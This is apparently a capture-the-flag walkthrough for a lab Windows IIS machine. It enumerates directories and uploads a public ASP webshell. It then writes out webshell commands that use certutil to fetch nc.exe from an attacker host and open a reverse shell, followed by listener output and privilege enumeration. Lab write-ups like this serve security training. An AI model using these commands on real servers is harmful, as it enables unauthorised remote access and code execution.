8 :80

http://10.10.10.116/
IIS 10.0 landing page

$ gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x aspx,asp,html,txt
===============================================================
/upload               (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]

http://10.10.10.116/upload/
# shows kashz.txt that we uploaded.

# .aspx => FAIL
|  (Warning: Do not create a MIME map for content that users should not download, such as .ASPX pages or .config files.)

# usual .asp shells not working 
Using https://github.com/tennc/webshell/blob/master/asp/webshell.asp
> works
# its a x64, using nc to get stable shell
http://10.10.10.116/upload/webshell.asp?cmd=certutil.exe -urlcache -f http://10.10.16.7/nc.exe C:\Users\Public\nc.exe
http://10.10.10.116/upload/webshell.asp?cmd=C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 6969


$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.116] 49676
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute

C:\Windows\SysWOW64\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

C:\Windows\SysWOW64\inetsrv>systeminfo
Host Name:                 CONCEAL
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.15063 N/A Build 15063
System Type:               x64-based PC
Hotfix(s):                 N/A

Last updated